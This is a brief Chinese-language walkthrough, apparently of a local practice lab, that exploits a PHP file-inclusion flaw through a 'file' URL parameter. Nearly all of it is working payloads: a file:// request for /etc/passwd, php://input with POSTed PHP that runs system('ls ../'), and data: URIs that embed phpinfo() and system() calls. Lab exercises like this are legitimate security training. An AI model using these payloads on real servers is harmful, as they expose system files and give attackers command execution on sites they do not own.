可以看到有file关键词可以进行php伪协议:
使用file伪协议查看/etc/passwd
?file=file:///etc/passwd
http://192.168.129.128:83/vulnerabilities/fu1.php?file=file:///etc/passwd
使用php://input伪协议去查看ls /
?file=php:input
(Post Data)
<?php phpinfo()?>
http://192.168.129.128:83/vulnerabilities/fu1.php?file=php://input
<?php system('ls ../');?>
使用data伪协议:
?file=data:,<?php phpinfo()?>
?file=data:,<?php system(ls ../)?>
http://192.168.129.128:83/vulnerabilities/fu1.php?file=data:,<?php phpinfo()?>